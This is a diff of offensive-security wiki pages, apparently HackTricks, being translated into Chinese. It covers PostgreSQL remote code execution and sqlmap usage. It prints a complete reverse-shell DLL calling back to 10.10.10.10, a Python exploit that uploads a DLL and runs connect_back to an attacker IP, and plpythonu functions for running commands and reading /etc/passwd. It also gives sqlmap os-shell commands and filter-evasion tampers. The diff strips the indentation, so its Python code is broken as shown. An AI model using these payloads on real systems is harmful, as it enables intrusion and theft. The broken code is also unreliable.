-In [**here** ](https://zerosum0x0.blogspot.com/2016/06/windows-dll-to-shell-postgres-servers.html)you can find this reverse-shell:
-
+在 [**这里** ](https://zerosum0x0.blogspot.com/2016/06/windows-dll-to-shell-postgres-servers.html) 你可以找到这个反向 shell：
 ```c
 #define PG_REVSHELL_CALLHOME_SERVER "10.10.10.10"
 #define PG_REVSHELL_CALLHOME_PORT "4444"
@@ -213,46 +194,46 @@ PG_MODULE_MAGIC;
 #define _WINSOCK_DEPRECATED_NO_WARNINGS
 
 BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL,
-                    _In_ DWORD fdwReason,
-                    _In_ LPVOID lpvReserved)
+_In_ DWORD fdwReason,
+_In_ LPVOID lpvReserved)
 {
-    WSADATA wsaData;
-    SOCKET wsock;
-    struct sockaddr_in server;
-    char ip_addr[16];
-    STARTUPINFOA startupinfo;
-    PROCESS_INFORMATION processinfo;
+WSADATA wsaData;
+SOCKET wsock;
+struct sockaddr_in server;
+char ip_addr[16];
+STARTUPINFOA startupinfo;
+PROCESS_INFORMATION processinfo;
 
-    char *program = "cmd.exe";
-    const char *ip = PG_REVSHELL_CALLHOME_SERVER;
-    u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);
+char *program = "cmd.exe";
+const char *ip = PG_REVSHELL_CALLHOME_SERVER;
+u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);
 
-    WSAStartup(MAKEWORD(2, 2), &wsaData);
-    wsock = WSASocket(AF_INET, SOCK_STREAM,
-                      IPPROTO_TCP, NULL, 0, 0);
+WSAStartup(MAKEWORD(2, 2), &wsaData);
+wsock = WSASocket(AF_INET, SOCK_STREAM,
+IPPROTO_TCP, NULL, 0, 0);
 
-    struct hostent *host;
-    host = gethostbyname(ip);
-    strcpy_s(ip_addr, sizeof(ip_addr),
-             inet_ntoa(*((struct in_addr *)host->h_addr)));
+struct hostent *host;
+host = gethostbyname(ip);
+strcpy_s(ip_addr, sizeof(ip_addr),
+inet_ntoa(*((struct in_addr *)host->h_addr)));
 
-    server.sin_family = AF_INET;
-    server.sin_port = htons(port);
-    server.sin_addr.s_addr = inet_addr(ip_addr);
+server.sin_family = AF_INET;
+server.sin_port = htons(port);
+server.sin_addr.s_addr = inet_addr(ip_addr);
 
-    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server),
-              NULL, NULL, NULL, NULL);
+WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server),
+NULL, NULL, NULL, NULL);
 
-    memset(&startupinfo, 0, sizeof(startupinfo));
-    startupinfo.cb = sizeof(startupinfo);
-    startupinfo.dwFlags = STARTF_USESTDHANDLES;
-    startupinfo.hStdInput = startupinfo.hStdOutput =
-                            startupinfo.hStdError = (HANDLE)wsock;
+memset(&startupinfo, 0, sizeof(startupinfo));
+startupinfo.cb = sizeof(startupinfo);
+startupinfo.dwFlags = STARTF_USESTDHANDLES;
+startupinfo.hStdInput = startupinfo.hStdOutput =
+startupinfo.hStdError = (HANDLE)wsock;
 
-    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,
-                  NULL, NULL, &startupinfo, &processinfo);
+CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,
+NULL, NULL, &startupinfo, &processinfo);
 
-    return TRUE;
+return TRUE;
 }
 
 #pragma warning(pop) /* re-enable 4996 */
@@ -264,91 +245,83 @@ PG_FUNCTION_INFO_V1(add_one);
 
 Datum dummy_function(PG_FUNCTION_ARGS)
 {
-    int32 arg = PG_GETARG_INT32(0);
+int32 arg = PG_GETARG_INT32(0);
 
-    PG_RETURN_INT32(arg + 1);
+PG_RETURN_INT32(arg + 1);
 }
 ```
-
-Note how in this case the **malicious code is inside the DllMain function**. This means that in this case it isn't necessary to execute the loaded function in postgresql, just **loading the DLL** will **execute** the reverse shell:
-
+注意在这种情况下，**恶意代码位于 DllMain 函数内部**。这意味着在这种情况下，不需要在 postgresql 中执行加载的函数，只需**加载 DLL** 就会**执行**反向 shell：
 ```c
 CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
 ```
+[PolyUDF项目](https://github.com/rop-la/PolyUDF)也是一个很好的起点，包含完整的MS Visual Studio项目和一个现成的库（包括：_command eval_，_exec_和_cleanup_）以及多版本支持。
 
-The [PolyUDF project](https://github.com/rop-la/PolyUDF) is also a good starting point with the full MS Visual Studio project and a ready to use library (including: _command eval_, _exec_ and _cleanup_) with multiversion support.
+### 最新PostgreSQL版本中的RCE
 
-### RCE in newest Prostgres versions
+在**最新版本**的PostgreSQL中，施加了限制，`superuser`被**禁止**从特定目录以外**加载**共享库文件，例如Windows上的`C:\Program Files\PostgreSQL\11\lib`或\*nix系统上的`/var/lib/postgresql/11/lib`。这些目录对NETWORK_SERVICE或postgres账户的写操作是**安全的**。
 
-In the **latest versions** of PostgreSQL, restrictions have been imposed where the `superuser` is **prohibited** from **loading** shared library files except from specific directories, such as `C:\Program Files\PostgreSQL\11\lib` on Windows or `/var/lib/postgresql/11/lib` on \*nix systems. These directories are **secured** against write operations by either the NETWORK_SERVICE or postgres accounts.
+尽管有这些限制，经过身份验证的数据库`superuser`仍然可以使用“大型对象”**写入二进制文件**到文件系统。此功能扩展到在`C:\Program Files\PostgreSQL\11\data`目录中写入，这对于更新或创建表等数据库操作至关重要。
 
-Despite these restrictions, it's possible for an authenticated database `superuser` to **write binary files** to the filesystem using "large objects." This capability extends to writing within the `C:\Program Files\PostgreSQL\11\data` directory, which is essential for database operations like updating or creating tables.
+一个显著的漏洞来自于`CREATE FUNCTION`命令，它**允许目录遍历**到数据目录。因此，经过身份验证的攻击者可以**利用这种遍历**将共享库文件写入数据目录，然后**加载它**。此漏洞使攻击者能够执行任意代码，实现系统上的本地代码执行。
 
-A significant vulnerability arises from the `CREATE FUNCTION` command, which **permits directory traversal** into the data directory. Consequently, an authenticated attacker could **exploit this traversal** to write a shared library file into the data directory and then **load it**. This exploit enables the attacker to execute arbitrary code, achieving native code execution on the system.
+#### 攻击流程
 
-#### Attack flow
-
-First of all you need to **use large objects to upload the dll**. You can see how to do that here:
+首先，您需要**使用大型对象上传dll**。您可以在这里查看如何做到这一点：
 
 {{#ref}}
 big-binary-files-upload-postgresql.md
 {{#endref}}
 
-Once you have uploaded the extension (with the name of poc.dll for this example) to the data directory you can load it with:
-
+一旦您将扩展（在此示例中名为poc.dll）上传到数据目录，您可以使用以下命令加载它：
 ```c
 create function connect_back(text, integer) returns void as '../data/poc', 'connect_back' language C strict;
 select connect_back('192.168.100.54', 1234);
 ```
+_请注意，您不需要附加 `.dll` 扩展名，因为创建函数会自动添加它。_
 
-_Note that you don't need to append the `.dll` extension as the create function will add it._
-
-For more information **read the**[ **original publication here**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
-In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_to learn how to compile a postgres extension read any of the previous versions_).\
-In the same page this **exploit to automate** this technique was given:
-
+有关更多信息，请**阅读**[**原始出版物**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**。**\
+在该出版物中，**这是**[**用于生成 postgres 扩展的代码**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_要了解如何编译 postgres 扩展，请阅读之前的任何版本_).\
+在同一页面上，**提供了自动化**此技术的**利用**：
 ```python
 #!/usr/bin/env python3
 import sys
 
 if len(sys.argv) != 4:
-    print("(+) usage %s <connectback> <port> <dll/so>" % sys.argv[0])
-    print("(+) eg: %s 192.168.100.54 1234 si-x64-12.dll" % sys.argv[0])
-    sys.exit(1)
+print("(+) usage %s <connectback> <port> <dll/so>" % sys.argv[0])
+print("(+) eg: %s 192.168.100.54 1234 si-x64-12.dll" % sys.argv[0])
+sys.exit(1)
 
 host = sys.argv[1]
 port = int(sys.argv[2])
 lib = sys.argv[3]
 with open(lib, "rb") as dll:
-    d = dll.read()
+d = dll.read()
 sql = "select lo_import('C:/Windows/win.ini', 1337);"
 for i in range(0, len(d)//2048):
-    start = i * 2048
-    end   = (i+1) * 2048
-    if i == 0:
-        sql += "update pg_largeobject set pageno=%d, data=decode('%s', 'hex') where loid=1337;" % (i, d[start:end].hex())
-    else:
-        sql += "insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode('%s', 'hex'));" % (i, d[start:end].hex())
+start = i * 2048
+end   = (i+1) * 2048
+if i == 0:
+sql += "update pg_largeobject set pageno=%d, data=decode('%s', 'hex') where loid=1337;" % (i, d[start:end].hex())
+else:
+sql += "insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode('%s', 'hex'));" % (i, d[start:end].hex())
 if (len(d) % 2048) != 0:
-    end   = (i+1) * 2048
-    sql += "insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode('%s', 'hex'));" % ((i+1), d[end:].hex())
+end   = (i+1) * 2048
+sql += "insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode('%s', 'hex'));" % ((i+1), d[end:].hex())
 
 sql += "select lo_export(1337, 'poc.dll');"
 sql += "create function connect_back(text, integer) returns void as '../data/poc', 'connect_back' language C strict;"
 sql += "select connect_back('%s', %d);" % (host, port)
 print("(+) building poc.sql file")
 with open("poc.sql", "w") as sqlfile:
-    sqlfile.write(sql)
+sqlfile.write(sql)
 print("(+) run poc.sql in PostgreSQL using the superuser")
 print("(+) for a db cleanup only, run the following sql:")
 print("    select lo_unlink(l.oid) from pg_largeobject_metadata l;")
 print("    drop function connect_back(text, integer);")
 ```
-
-## References
+## 参考文献
 
 - [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
 - [https://www.exploit-db.com/papers/13084](https://www.exploit-db.com/papers/13084)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
index cfa98bb50..2e52767e2 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
@@ -4,36 +4,34 @@
 
 ## PostgreSQL Languages
 
-The PostgreSQL database you got access to may have different **scripting languages installed** that you could abuse to **execute arbitrary code**.
-
-You can **get them running**:
+您获得访问权限的 PostgreSQL 数据库可能安装了不同的 **脚本语言**，您可以利用这些语言来 **执行任意代码**。
 
+您可以 **让它们运行**：
 ```sql
 \dL *
 
 SELECT lanname,lanpltrusted,lanacl FROM pg_language;
 ```
-
-Most of the scripting languages you can install in PostgreSQL have **2 flavours**: the **trusted** and the **untrusted**. The **untrusted** will have a name **ended in "u"** and will be the version that will allow you to **execute code** and use other interesting functions. This are languages that if installed are interesting:
+大多数可以在 PostgreSQL 中安装的脚本语言有 **2 种类型**：**受信任的**和**不受信任的**。**不受信任的**语言名称**以 "u" 结尾**，并且是允许你**执行代码**和使用其他有趣功能的版本。如果安装了这些语言，它们会很有趣：
 
 - **plpythonu**
 - **plpython3u**
 - **plperlu**
 - **pljavaU**
 - **plrubyu**
-- ... (any other programming language using an insecure version)
+- ...（任何其他使用不安全版本的编程语言）
 
 > [!WARNING]
-> If you find that an interesting language is **installed** but **untrusted** by PostgreSQL (**`lanpltrusted`** is **`false`**) you can try to **trust it** with the following line so no restrictions will be applied by PostgreSQL:
+> 如果你发现一个有趣的语言是**已安装**但被 PostgreSQL **标记为不受信任**（**`lanpltrusted`** 为 **`false`**），你可以尝试用以下语句**信任它**，这样 PostgreSQL 就不会施加任何限制：
 >
 > ```sql
 > UPDATE pg_language SET lanpltrusted=true WHERE lanname='plpythonu';
-> # To check your permissions over the table pg_language
+> # 检查你对表 pg_language 的权限
 > SELECT * FROM information_schema.table_privileges WHERE table_name = 'pg_language';
 > ```
 
 > [!CAUTION]
-> If you don't see a language, you could try to load it with (**you need to be superadmin**):
+> 如果你没有看到某种语言，你可以尝试加载它（**你需要是超级管理员**）：
 >
 > ```
 > CREATE EXTENSION plpythonu;
@@ -43,248 +41,229 @@ Most of the scripting languages you can install in PostgreSQL have **2 flavours*
 > CREATE EXTENSION plrubyu;
 > ```
 
-Note that it's possible to compile the secure versions as "unsecure". Check [**this**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html) for example. So it's always worth trying if you can execute code even if you only find installed the **trusted** one.
+请注意，可以将安全版本编译为“不安全”。例如，查看 [**this**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html)。因此，如果你只发现安装了**受信任的**版本，尝试执行代码总是值得的。
 
 ## plpythonu/plpython3u
 
 {{#tabs}}
 {{#tab name="RCE"}}
-
 ```sql
 CREATE OR REPLACE FUNCTION exec (cmd text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import os
-    return os.popen(cmd).read()
-    #return os.execve(cmd, ["/usr/lib64/pgsql92/bin/psql"], {})
+import os
+return os.popen(cmd).read()
+#return os.execve(cmd, ["/usr/lib64/pgsql92/bin/psql"], {})
 $$
 LANGUAGE 'plpythonu';
 
 SELECT cmd("ls"); #RCE with popen or execve
 ```
-
 {{#endtab}}
 
-{{#tab name="Get OS user"}}
-
+{{#tab name="获取操作系统用户"}}
 ```sql
 CREATE OR REPLACE FUNCTION get_user (pkg text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import os
-    return os.getlogin()
+import os
+return os.getlogin()
 $$
 LANGUAGE 'plpythonu';
 
 SELECT get_user(""); #Get user, para is useless
 ```
-
 {{#endtab}}
 
 {{#tab name="List dir"}}
-
 ```sql
 CREATE OR REPLACE FUNCTION lsdir (dir text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import json
-    from os import walk
-    files = next(walk(dir), (None, None, []))
-    return json.dumps({"root": files[0], "dirs": files[1], "files": files[2]})[:65535]
+import json
+from os import walk
+files = next(walk(dir), (None, None, []))
+return json.dumps({"root": files[0], "dirs": files[1], "files": files[2]})[:65535]
 $$
 LANGUAGE 'plpythonu';
 
 SELECT lsdir("/"); #List dir
 ```
-
 {{#endtab}}
 
-{{#tab name="Find W folder"}}
-
+{{#tab name="查找 W 文件夹"}}
 ```sql
 CREATE OR REPLACE FUNCTION findw (dir text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import os
-    def my_find(path):
-        writables = []
-        def find_writable(path):
-            if not os.path.isdir(path):
-                return
-            if os.access(path, os.W_OK):
-                writables.append(path)
-            if not os.listdir(path):
-                return
-            else:
-                for item in os.listdir(path):
-                    find_writable(os.path.join(path, item))
-        find_writable(path)
-        return writables
+import os
+def my_find(path):
+writables = []
+def find_writable(path):
+if not os.path.isdir(path):
+return
+if os.access(path, os.W_OK):
+writables.append(path)
+if not os.listdir(path):
+return
+else:
+for item in os.listdir(path):
+find_writable(os.path.join(path, item))
+find_writable(path)
+return writables
 
-    return ", ".join(my_find(dir))
+return ", ".join(my_find(dir))
 $$
 LANGUAGE 'plpythonu';
 
 SELECT findw("/"); #Find Writable folders from a folder (recursively)
 ```
-
 {{#endtab}}
 
-{{#tab name="Find File"}}
-
+{{#tab name="查找文件"}}
 ```sql
 CREATE OR REPLACE FUNCTION find_file (exe_sea text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import os
-    def my_find(path):
-        executables = []
-        def find_executables(path):
-            if not os.path.isdir(path):
-                executables.append(path)
+import os
+def my_find(path):
+executables = []
+def find_executables(path):
+if not os.path.isdir(path):
+executables.append(path)
 
-            if os.path.isdir(path):
-                if not os.listdir(path):
-                    return
-                else:
-                    for item in os.listdir(path):
-                        find_executables(os.path.join(path, item))
-        find_executables(path)
-        return executables
+if os.path.isdir(path):
+if not os.listdir(path):
+return
+else:
+for item in os.listdir(path):
+find_executables(os.path.join(path, item))
+find_executables(path)
+return executables
 
-    a = my_find("/")
-    b = []
+a = my_find("/")
+b = []
 
-    for i in a:
-        if exe_sea in os.path.basename(i):
-            b.append(i)
-    return ", ".join(b)
+for i in a:
+if exe_sea in os.path.basename(i):
+b.append(i)
+return ", ".join(b)
 $$
 LANGUAGE 'plpythonu';
 
 SELECT find_file("psql"); #Find a file
 ```
-
 {{#endtab}}
 
-{{#tab name="Find executables"}}
-
+{{#tab name="查找可执行文件"}}
 ```sql
 CREATE OR REPLACE FUNCTION findx (dir text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import os
-    def my_find(path):
-        executables = []
-        def find_executables(path):
-            if not os.path.isdir(path) and os.access(path, os.X_OK):
-                executables.append(path)
+import os
+def my_find(path):
+executables = []
+def find_executables(path):
+if not os.path.isdir(path) and os.access(path, os.X_OK):
+executables.append(path)
 
-            if os.path.isdir(path):
-                if not os.listdir(path):
-                    return
-                else:
-                    for item in os.listdir(path):
-                        find_executables(os.path.join(path, item))
-        find_executables(path)
-        return executables
+if os.path.isdir(path):
+if not os.listdir(path):
+return
+else:
+for item in os.listdir(path):
+find_executables(os.path.join(path, item))
+find_executables(path)
+return executables
 
-    a = my_find(dir)
-    b = []
+a = my_find(dir)
+b = []
 
-    for i in a:
-        b.append(os.path.basename(i))
-    return ", ".join(b)
+for i in a:
+b.append(os.path.basename(i))
+return ", ".join(b)
 $$
 LANGUAGE 'plpythonu';
 
 SELECT findx("/"); #Find an executables in folder (recursively)
 ```
-
 {{#endtab}}
 
-{{#tab name="Find exec by subs"}}
-
+{{#tab name="通过子字符串查找 exec"}}
 ```sql
 CREATE OR REPLACE FUNCTION find_exe (exe_sea text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import os
-    def my_find(path):
-        executables = []
-        def find_executables(path):
-            if not os.path.isdir(path) and os.access(path, os.X_OK):
-                executables.append(path)
+import os
+def my_find(path):
+executables = []
+def find_executables(path):
+if not os.path.isdir(path) and os.access(path, os.X_OK):
+executables.append(path)
 
-            if os.path.isdir(path):
-                if not os.listdir(path):
-                    return
-                else:
-                    for item in os.listdir(path):
-                        find_executables(os.path.join(path, item))
-        find_executables(path)
-        return executables
+if os.path.isdir(path):
+if not os.listdir(path):
+return
+else:
+for item in os.listdir(path):
+find_executables(os.path.join(path, item))
+find_executables(path)
+return executables
 
-    a = my_find("/")
-    b = []
+a = my_find("/")
+b = []
 
-    for i in a:
-        if exe_sea in i:
-            b.append(i)
-    return ", ".join(b)
+for i in a:
+if exe_sea in i:
+b.append(i)
+return ", ".join(b)
 $$
 LANGUAGE 'plpythonu';
 
 SELECT find_exe("psql"); #Find executable by susbstring
 ```
-
 {{#endtab}}
 
-{{#tab name="Read"}}
-
+{{#tab name="阅读"}}
 ```sql
 CREATE OR REPLACE FUNCTION read (path text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import base64
-    encoded_string= base64.b64encode(open(path).read())
-    return encoded_string.decode('utf-8')
-    return open(path).read()
+import base64
+encoded_string= base64.b64encode(open(path).read())
+return encoded_string.decode('utf-8')
+return open(path).read()
 $$
 LANGUAGE 'plpythonu';
 
 select read('/etc/passwd'); #Read a file in b64
 ```
-
 {{#endtab}}
 
-{{#tab name="Get perms"}}
-
+{{#tab name="获取权限"}}
 ```sql
 CREATE OR REPLACE FUNCTION get_perms (path text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import os
-    status = os.stat(path)
-    perms = oct(status.st_mode)[-3:]
-    return str(perms)
+import os
+status = os.stat(path)
+perms = oct(status.st_mode)[-3:]
+return str(perms)
 $$
 LANGUAGE 'plpythonu';
 
 select get_perms("/etc/passwd"); # Get perms of file
 ```
-
 {{#endtab}}
 
 {{#tab name="Request"}}
-
 ```sql
 CREATE OR REPLACE FUNCTION req2 (url text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    import urllib
-    r = urllib.urlopen(url)
-    return r.read()
+import urllib
+r = urllib.urlopen(url)
+return r.read()
 $$
 LANGUAGE 'plpythonu';
 
@@ -293,21 +272,20 @@ SELECT req2('https://google.com'); #Request using python2
 CREATE OR REPLACE FUNCTION req3 (url text)
 RETURNS VARCHAR(65535) stable
 AS $$
-    from urllib import request
-    r = request.urlopen(url)
-    return r.read()
+from urllib import request
+r = request.urlopen(url)
+return r.read()
 $$
 LANGUAGE 'plpythonu';
 
 SELECT req3('https://google.com'); #Request using python3
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ## pgSQL
 
-Check the following page:
+查看以下页面：
 
 {{#ref}}
 pl-pgsql-password-bruteforce.md
@@ -315,11 +293,10 @@ pl-pgsql-password-bruteforce.md
 
 ## C
 
-Check the following page:
+查看以下页面：
 
 {{#ref}}
 rce-with-postgresql-extensions.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/sqlmap.md b/src/pentesting-web/sql-injection/sqlmap.md
index 710dc83cf..a0ce2f540 100644
--- a/src/pentesting-web/sql-injection/sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap.md
@@ -1,9 +1,8 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# Basic arguments for SQLmap
-
-## Generic
+# SQLmap的基本参数
 
+## 通用
 ```bash
 -u "<URL>"
 -p "<PARAM TO TEST>"
@@ -20,11 +19,9 @@
 --auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
 --proxy=PROXY
 ```
+## 获取信息
 
-## Retrieve Information
-
-### Internal
-
+### 内部
 ```bash
 --current-user #Get current user
 --is-dba #Check if current user is Admin
@@ -32,9 +29,7 @@
 --users #Get usernames od DB
 --passwords #Get passwords of users in DB
 ```
-
-### DB data
-
+### 数据库数据
 ```bash
 --all #Retrieve everything
 --dump #Dump DBMS database table entries
@@ -43,32 +38,24 @@
 --columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
 -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
 ```
+# 注入位置
 
-# Injection place
-
-## From Burp/ZAP capture
-
-Capture the request and create a req.txt file
+## 来自 Burp/ZAP 捕获
 
+捕获请求并创建一个 req.txt 文件
 ```bash
 sqlmap -r req.txt --current-user
 ```
-
-## GET Request Injection
-
+## GET 请求注入
 ```bash
 sqlmap -u "http://example.com/?id=1" -p id
 sqlmap -u "http://example.com/?id=*" -p id
 ```
-
-## POST Request Injection
-
+## POST 请求注入
 ```bash
 sqlmap -u "http://example.com" --data "username=*&password=*"
 ```
-
-## Injections in Headers and other HTTP Methods
-
+## 在头部和其他HTTP方法中的注入
 ```bash
 #Inside cookie
 sqlmap  -u "http://example.com" --cookie "mycookies=*"
@@ -82,16 +69,12 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
 
 #The injection is located at the '*'
 ```
-
-## Second order injection
-
+## 二次注入
 ```bash
 python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
 ```
-
 ## Shell
-
 ```bash
 #Exec command
 python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
@@ -102,9 +85,7 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
 #Dropping a reverse-shell / meterpreter
 python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
 ```
-
-## Crawl a website with SQLmap and auto-exploit
-
+## 使用SQLmap爬取网站并自动利用
 ```bash
 sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
 
@@ -112,83 +93,73 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
 --crawl = how deep you want to crawl a site
 --forms = Parse and test forms
 ```
+# 自定义注入
 
-# Customizing Injection
-
-## Set a suffix
-
+## 设置后缀
 ```bash
 python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
 ```
-
-## Prefix
-
+## 前言
 ```bash
 python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "
 ```
-
-## Help finding boolean injection
-
+## 帮助寻找布尔注入
 ```bash
 # The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
 sqlmap -r r.txt -p id --not-string ridiculous --batch
 ```
-
-## Tamper
-
+## 修改
 ```bash
 --tamper=name_of_the_tamper
 #In kali you can see all the tampers in /usr/share/sqlmap/tamper
 ```
-
 | Tamper                       | Description                                                                                                                        |
 | :--------------------------- | :--------------------------------------------------------------------------------------------------------------------------------- |
-| apostrophemask.py            | Replaces apostrophe character with its UTF-8 full width counterpart                                                                |
-| apostrophenullencode.py      | Replaces apostrophe character with its illegal double unicode counterpart                                                          |
-| appendnullbyte.py            | Appends encoded NULL byte character at the end of payload                                                                          |
-| base64encode.py              | Base64 all characters in a given payload                                                                                           |
-| between.py                   | Replaces greater than operator \('&gt;'\) with 'NOT BETWEEN 0 AND \#'                                                              |
-| bluecoat.py                  | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
-| chardoubleencode.py          | Double url-encodes all characters in a given payload \(not processing already encoded\)                                            |
-| commalesslimit.py            | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'                                                                       |
-| commalessmid.py              | Replaces instances like 'MID\(A, B, C\)' with 'MID\(A FROM B FOR C\)'                                                              |
-| concat2concatws.py           | Replaces instances like 'CONCAT\(A, B\)' with 'CONCAT_WS\(MID\(CHAR\(0\), 0, 0\), A, B\)'                                          |
-| charencode.py                | Url-encodes all characters in a given payload \(not processing already encoded\)                                                   |
-| charunicodeencode.py         | Unicode-url-encodes non-encoded characters in a given payload \(not processing already encoded\). "%u0022"                         |
-| charunicodeescape.py         | Unicode-url-encodes non-encoded characters in a given payload \(not processing already encoded\). "\u0022"                         |
-| equaltolike.py               | Replaces all occurances of operator equal \('='\) with operator 'LIKE'                                                             |
-| escapequotes.py              | Slash escape quotes \(' and "\)                                                                                                    |
-| greatest.py                  | Replaces greater than operator \('&gt;'\) with 'GREATEST' counterpart                                                              |
-| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword                                                                                   |
-| ifnull2ifisnull.py           | Replaces instances like 'IFNULL\(A, B\)' with 'IF\(ISNULL\(A\), B, A\)'                                                            |
-| modsecurityversioned.py      | Embraces complete query with versioned comment                                                                                     |
-| modsecurityzeroversioned.py  | Embraces complete query with zero-versioned comment                                                                                |
-| multiplespaces.py            | Adds multiple spaces around SQL keywords                                                                                           |
-| nonrecursivereplacement.py   | Replaces predefined SQL keywords with representations suitable for replacement \(e.g. .replace\("SELECT", ""\)\) filters           |
-| percentage.py                | Adds a percentage sign \('%'\) infront of each character                                                                           |
-| overlongutf8.py              | Converts all characters in a given payload \(not processing already encoded\)                                                      |
-| randomcase.py                | Replaces each keyword character with random case value                                                                             |
-| randomcomments.py            | Add random comments to SQL keywords                                                                                                |
-| securesphere.py              | Appends special crafted string                                                                                                     |
-| sp_password.py               | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs                                           |
-| space2comment.py             | Replaces space character \(' '\) with comments                                                                                     |
-| space2dash.py                | Replaces space character \(' '\) with a dash comment \('--'\) followed by a random string and a new line \('\n'\)                  |
-| space2hash.py                | Replaces space character \(' '\) with a pound character \('\#'\) followed by a random string and a new line \('\n'\)               |
-| space2morehash.py            | Replaces space character \(' '\) with a pound character \('\#'\) followed by a random string and a new line \('\n'\)               |
-| space2mssqlblank.py          | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters                            |
-| space2mssqlhash.py           | Replaces space character \(' '\) with a pound character \('\#'\) followed by a new line \('\n'\)                                   |
-| space2mysqlblank.py          | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters                            |
-| space2mysqldash.py           | Replaces space character \(' '\) with a dash comment \('--'\) followed by a new line \('\n'\)                                      |
-| space2plus.py                | Replaces space character \(' '\) with plus \('+'\)                                                                                 |
-| space2randomblank.py         | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters                            |
-| symboliclogical.py           | Replaces AND and OR logical operators with their symbolic counterparts \(&& and                                                    |
-| unionalltounion.py           | Replaces UNION ALL SELECT with UNION SELECT                                                                                        |
-| unmagicquotes.py             | Replaces quote character \('\) with a multi-byte combo %bf%27 together with generic comment at the end \(to make it work\)         |
-| uppercase.py                 | Replaces each keyword character with upper case value 'INSERT'                                                                     |
-| varnish.py                   | Append a HTTP header 'X-originating-IP'                                                                                            |
-| versionedkeywords.py         | Encloses each non-function keyword with versioned MySQL comment                                                                    |
-| versionedmorekeywords.py     | Encloses each keyword with versioned MySQL comment                                                                                 |
-| xforwardedfor.py             | Append a fake HTTP header 'X-Forwarded-For'                                                                                        |
+| apostrophemask.py            | 用其 UTF-8 全宽对应字符替换撇号字符                                                                                               |
+| apostrophenullencode.py      | 用其非法双重 Unicode 对应字符替换撇号字符                                                                                         |
+| appendnullbyte.py            | 在有效负载末尾附加编码的 NULL 字节字符                                                                                             |
+| base64encode.py              | 对给定有效负载中的所有字符进行 Base64 编码                                                                                         |
+| between.py                   | 用 'NOT BETWEEN 0 AND #' 替换大于运算符 \('&gt;'\)                                                                                 |
+| bluecoat.py                  | 用有效的随机空白字符替换 SQL 语句后的空格字符。然后用 LIKE 运算符替换字符 =                                                          |
+| chardoubleencode.py          | 对给定有效负载中的所有字符进行双重 URL 编码（不处理已编码的字符）                                                                  |
+| commalesslimit.py            | 用 'LIMIT N OFFSET M' 替换 'LIMIT M, N' 的实例                                                                                     |
+| commalessmid.py              | 用 'MID\(A FROM B FOR C\)' 替换 'MID\(A, B, C\)' 的实例                                                                            |
+| concat2concatws.py           | 用 'CONCAT_WS\(MID\(CHAR\(0\), 0, 0\), A, B\)' 替换 'CONCAT\(A, B\)' 的实例                                                        |
